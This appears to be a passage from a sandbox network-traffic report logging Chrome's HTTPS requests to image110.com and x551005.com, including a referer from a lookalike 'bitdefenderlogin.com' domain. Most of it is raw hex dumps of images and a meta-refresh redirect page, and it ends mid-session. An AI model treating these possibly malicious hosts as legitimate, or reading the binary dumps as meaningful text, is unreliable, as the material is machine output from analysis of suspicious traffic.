                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36
                                                                                                                                                          Data Ascii: XYZ o8XYZ bXYZ $descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966
                                                                                                                                                          2024-06-09 22:40:39 UTC6758INData Raw: 0d 57 87 e4 6a 0a fa f4 96 08 30 aa ed cf 2d 24 42 d4 d2 12 14 a9 51 ea f5 02 2b f8 b2 f4 f3 35 60 fd 39 c7 fa 3d d0 7c d9 d4 bc 03 ab f9 b3 0f e9 7f 4a f3 2d 7e 60 e9 76 58 a3 cc 1f 39 8e e3 38 4a d4 c1 4f 98 73 5d 3e 27 4b f3 89 96 71 5f e5 51 e2 14 34 bf 39 51 4e 29 43 45 24 97 5f 57 a8 58 f4 df eb ca 7f 54 18 c6 63 a1 c8 5d 05 c5 b0 aa 6c b3 fe 6e 33 ad 65 1e 65 cc 99 39 f1 83 90 ba 9f 81 4f 88 e1 78 d3 d2 60 b8 8e 21 15 35 5c 32 d3 34 d5 38 5d 55 4c 33 8c 3c a5 54 66 59 e4 8e 89 fd 5e a7 6c 9b f8 82 74 1f 3b 75 17 2d 74 df 08 ea af 4c ab b1 0c c1 98 71 4c a9 4d 8b e0 7d 5c c8 98 9c 35 f4 21 61 5c 11 f0 aa 4a 2a b7 c4 6a f1 0c 4e 6a e8 20 f9 17 a4 85 62 92 2a c1 e7 c8 b1 d1 36 21 ea f5 0d d9 53 d5 4f 41 73 8f f5 96 6c 33 3d ff 00 2a c2 72 c6 13 59 d4
                                                                                                                                                          Data Ascii: Wj0-$BQ+5`9=|J-~`vX98JOs]>'Kq_Q49QN)CE$_WXTc]ln3ee9Ox`!5\248]UL3<TfY^lt;u-tLqLM}\5!a\J*jNj b*6!SOAsl3=*rY


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          44192.168.2.549766103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC627OUTGET /uploads/37a8a24f17444e01c16fc74cec5c8d23.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:38 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 54005
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:19 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf63-d2f5"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:38 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC16038INData Raw: 47 49 46 38 39 61 4e 01 51 00 f7 ff 00 55 aa c6 f8 f7 f7 aa 9e 9e 6e 51 26 05 9a c8 4e 8e a3 e3 df df d5 af 24 96 d3 e5 f4 51 0d 20 9d 99 f4 d2 49 b6 a7 5b 62 4b 41 ff ff 31 d5 aa 12 ae 92 2c 6a d3 f3 ea dc 77 ff 00 eb ff ff 4e 10 d4 d0 c8 ba 67 e3 ca 66 aa a5 72 a9 04 8d 8c 79 4b 32 12 06 fd fd 92 f9 cf 2b d7 d3 ab 97 84 47 1f 20 2b 57 c7 e9 00 86 b7 f3 eb 82 f7 f7 01 2c 71 69 dc c5 64 b4 ae 8e 0c 2e 51 10 6b 8d 56 43 07 34 28 05 d5 d1 04 2f 8a a8 76 62 2d e3 df 01 f6 f3 8a c3 e7 f2 00 92 be ff fe eb a3 a2 25 37 b5 db 2e 48 4e 2d 76 91 ff ff c8 8d 83 78 d7 d0 92 fe fd d7 2a 18 18 4d 31 24 ff ff b6 7c 63 10 f3 62 26 83 0c 63 15 9f c9 45 32 03 ff fe 67 28 82 79 fb fb 8e 7b 71 4a d4 d3 50 82 71 68 e8 dc 92 fd d1 bd 90 33 0e 05 04 01 89 6b 33 73 5a 02 bb b4
                                                                                                                                                          Data Ascii: GIF89aNQUnQ&N$Q I[bKA1,jwNgfryK2+G +W,qid.QkVC4(/vb-%7.HN-vx*M1$|cb&cE2g(y{qJPqh3k3sZ
                                                                                                                                                          2024-06-09 22:40:38 UTC16384INData Raw: bf fb ac a4 8f 90 3a 5d 25 a2 d6 8f 3c 0c d2 74 32 98 14 1b 04 11 af 35 54 8d 52 22 40 64 3f 62 a0 ff bb 50 05 0c 95 6b ca c5 30 81 f8 4a 5e be 32 98 9f c8 85 29 90 f9 89 1b 58 c3 89 3c 88 1e 39 46 58 bd 50 a2 f2 06 29 24 21 13 9d e8 b1 e8 4d 71 03 81 00 28 2a 43 8a ca 5c 4c 91 7a 1d 71 e5 27 02 11 c4 5e 8c d2 16 c9 f8 64 20 80 01 0c 5b dc 40 7c 0b bd 64 01 86 f9 cc 93 a0 2c 25 d5 f4 07 88 de 04 92 a0 ce 0f 34 ec c0 26 38 41 22 47 32 c2 2f 44 41 a0 91 b6 7a 86 92 6e 3d 2a 01 09 68 06 bc 9a 11 80 77 2d 01 69 e8 32 24 33 20 79 4f ca cc 73 9f c5 89 4c 0a 40 02 0c 51 7e a2 ad 3a d5 c5 49 a7 68 d1 10 24 a7 05 4d 44 81 33 7b c5 83 4d fa 15 95 bd d0 a4 5f 37 1a 3e 5f 7a 04 a4 a2 04 46 20 5a c0 58 c6 6e 07 95 c0 18 c9 06 42 b9 52 88 35 d6 b1 11 bb 2c c4 90 89 49
                                                                                                                                                          Data Ascii: :]%<t25TR"@d?bPk0J^2)X<9FXP)$!Mq(*C\Lzq'^d [@|d,%4&8A"G2/DAzn=*hw-i2$3 yOsL@Q~:Ih$MD3{M_7>_zF ZXnBR5,I
                                                                                                                                                          2024-06-09 22:40:39 UTC16384INData Raw: ad 98 09 9d 9b 89 a2 82 da ac 1f e1 ae a5 09 af 77 29 a9 9e 59 a6 f6 ea 96 f8 fa ac ec 9a 92 08 fa 98 f8 fa a1 93 99 ac a1 5a b0 06 4b a8 ff 3a 97 4f 2a 98 73 30 b0 a7 19 af 6e f9 b0 4a 2a b1 9b 09 b1 fe ba b0 29 e9 94 fa 0a b1 f3 5a 94 1d 8b 12 1c 3b b1 75 5a a3 1a 5b 9c 65 c0 07 2a db a4 28 91 b2 2b 1b 13 2e ab b2 29 91 b1 27 5b b3 81 23 61 b3 38 8b 15 34 9b b3 3c 7b 12 3b db b3 40 4b 29 1a 31 b4 44 5b b4 46 7b b4 48 9b b4 4a bb b4 44 1b 10 00 21 f9 04 05 14 00 ff 00 2c 00 00 00 00 4e 01 51 00 00 08 ff 00 f7 09 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 2a fc c7 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 19 52 20 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 37 6d 02 1d 4a b4 a8 d1 a3 2d 33 64 70
                                                                                                                                                          Data Ascii: w)YZK:O*s0nJ*)Z;uZ[e*(+.)'[#a84<{;@K)1D[F{HJD!,NQH*\#JH3* CI(S\0cR 8s7mJ-3dp
                                                                                                                                                          2024-06-09 22:40:39 UTC5199INData Raw: 2e f6 99 87 0d 6c 4f 0e 5b 08 8f 26 c9 3b 3e fa 21 05 1f 89 39 83 de f3 01 8d 1c 04 5c 8f 04 d0 b3 16 74 9e f7 67 b4 95 ea ba 23 d0 ee 75 b5 17 31 6c 66 9c da 99 cc 06 49 bc 85 c0 8c 65 fb 1a d8 f4 8e f6 3f a4 f9 91 7d 57 fb 1f 29 a0 f6 4a 7e 16 84 1e 11 e2 96 e9 06 62 9e 03 94 ea ef de aa 4e 0c 8e db ab 0d 4d d9 84 fb 5a ce 5c 1e b6 24 c0 1c ed 20 73 e4 12 22 ff f7 77 af 41 fe 8f 80 13 5b d8 cc 38 f8 be 59 ce 11 8f cb 1b 25 18 96 a7 df d6 4d f1 75 57 c6 23 e1 96 09 c7 1d 7b 09 02 18 9d 00 f3 3e 3a 01 46 7e 92 64 1c 9d 19 cc 25 c7 26 6c 50 74 a5 33 dd 24 4e 3f 3a c0 95 ce e8 a3 db 39 24 8b 50 ba cc 95 4e 73 90 e4 5c 5f 36 ab cb 94 e1 28 a1 5b ab dd 2b 7e f1 0a d0 3b 63 6b 0b e5 fa dd 20 a9 ba d1 ab 6d 0d ab 9f 64 10 47 97 44 d4 6f ac f4 a3 b3 7c 10 37 d8
                                                                                                                                                          Data Ascii: .lO[&;>!9\tg#u1lfIe?}W)J~bNMZ\$ s"wA[8Y%MuW#{>:F~d%&lPt3$N?:9$PNs\_6([+~;ck mdGDo|7


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          45192.168.2.549768103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC627OUTGET /uploads/d37314d9711f2230688aca13698b9e6f.png HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:38 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 13472
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:40 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfb4-34a0"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:38 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC13472INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 4e 00 00 00 51 08 02 00 00 00 32 c6 d8 c4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                          Data Ascii: PNGIHDRNQ2pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          46192.168.2.549769103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC627OUTGET /uploads/6efc250fa2d2248025dd908007f87d44.png HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:38 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 10381
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:24:00 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf50-288d"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:38 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:38 UTC10381INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 4e 00 00 00 51 08 02 00 00 00 32 c6 d8 c4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0a 4d 69 43 43 50 50 68 6f 74 6f 73 68 6f 70 20 49 43 43 20 70 72 6f 66 69 6c 65 00 00 78 da 9d 53 77 58 93 f7 16 3e df f7 65 0f 56 42 d8 f0 b1 97 6c 81 00 22 23 ac 08 c8 10 59 a2 10 92 00 61 84 10 12 40 c5 85 88 0a 56 14 15 11 9c 48 55 c4 82 d5 0a 48 9d 88 e2 a0 28 b8 67 41 8a 88 5a 8b 55 5c 38 ee 1f dc a7 b5 7d 7a ef ed ed fb d7 fb bc e7 9c e7 fc ce 79 cf 0f 80 11 12 26 91 e6 a2 6a 00 39 52 85 3c 3a d8 1f 8f 4f 48 c4 c9 bd 80 02 15 48 e0 04 20 10 e6 cb c2 67 05 c5 00 00 f0 03 79 78 7e 74 b0 3f fc 01 af 6f 00 02 00 70 d5 2e 24 12 c7 e1 ff 83 ba 50 26 57 00 20 91 00 e0 22 12 e7 0b 01 90 52
                                                                                                                                                          Data Ascii: PNGIHDRNQ2pHYsMiCCPPhotoshop ICC profilexSwX>eVBl"#Ya@VHUH(gAZU\8}zy&j9R<:OHH gyx~t?op.$P&W "R


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          47192.168.2.54976138.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC634OUTGET / HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:38 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:38 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:40:38 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:40:38 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:40:38 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:40:38 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:40:38 UTC5INData Raw: 35 38 30 0d 0a
                                                                                                                                                          Data Ascii: 580
                                                                                                                                                          2024-06-09 22:40:38 UTC1415INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 3f 5f 5f 43 42 4b 3d 33 64 61 36 38 38 34 61 62 65 62 62 61 39 39 31 32 36 61 36 38 62 38 63 32 32 39 35 34 34 63 62 65 31 37 31 37 39 37 32 38 33 39 5f 31 32 31 33 37 32 33 39 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f 3b 0a 09 77 69 64 74 68 3a 20 38
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/?__CBK=3da6884abebba99126a68b8c229544cbe1717972839_12137239" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto;width: 8


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          48192.168.2.549771103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:38 UTC384OUTGET /uploads/2c1f839ada8da6bd490319712036dc70.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:39 UTC345INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:39 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 6952
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:46 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf42-1b28"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:39 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:39 UTC6952INData Raw: 47 49 46 38 39 61 4d 01 51 00 f7 00 00 88 77 49 d5 c5 85 3a 39 39 c6 b7 87 47 43 37 ff 6b a1 21 21 21 a7 98 65 38 35 2b 41 41 41 58 54 47 36 35 35 25 26 25 31 31 31 2a 2a 2a 74 6a 49 88 7b 53 87 81 6a fc e9 a5 69 65 59 a6 93 58 d3 cb a5 a4 00 00 ca b8 7a 44 44 44 49 49 49 4d 4d 4d bd b1 85 2e 2e 2d b3 a7 7c fe d0 a5 92 89 66 f2 d0 cc a7 9c 76 6a 62 47 7a 73 59 82 7c 65 a3 88 4a fc fc e5 ca ab 57 92 90 88 c6 bc 94 a0 b1 ce 52 52 51 88 71 3e 7d 76 63 67 59 38 54 4d 37 ab a3 86 9c 94 77 72 6c 56 60 5a 44 b7 a5 67 cb b4 68 b3 a9 87 3c 39 2f d0 6a 47 e5 d6 9d 5c 52 39 9c 81 45 ca 6b 6b c3 ac 64 f5 b0 88 75 63 3b cb c1 99 ff 33 00 3f 3f 3f fa e6 e6 e2 ce 89 b1 9a 57 d9 c5 77 46 46 46 92 8c 72 6d 6b 66 3c 3c 3c 40 3d 31 d7 ab ab d9 cd a0 b8 38 38 9c 8c 5c d3 bb
                                                                                                                                                          Data Ascii: GIF89aMQwI:99GC7k!!!e85+AAAXTG655%&%111***tjI{SjieYXzDDDIIIMMM..-|fvjbGzsY|eJWRRQq>}vcgY8TM7wrlV`ZDgh<9/jG\R9Ekkduc;3???WwFFFrmkf<<<@=188\


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          49192.168.2.54976038.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC578OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: x551005.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://x551005.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:39 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:40:39 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:40:39 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:40:39 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:40:39 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:40:39 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:40:39 UTC5INData Raw: 35 38 62 0d 0a
                                                                                                                                                          Data Ascii: 58b
                                                                                                                                                          2024-06-09 22:40:39 UTC1426INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 43 42 4b 3d 33 63 38 35 37 34 32 65 39 63 31 30 63 64 62 66 31 62 39 39 62 61 31 64 33 64 38 32 39 30 30 65 31 31 37 31 37 39 37 32 38 34 30 5f 31 32 31 33 37 32 34 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/favicon.ico?__CBK=3c85742e9c10cdbf1b99ba1d3d82900e11717972840_12137241" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          50192.168.2.549772103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:39 UTC627OUTGET /uploads/99c81df9877d0dafd4d7975b0032f698.jpg HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
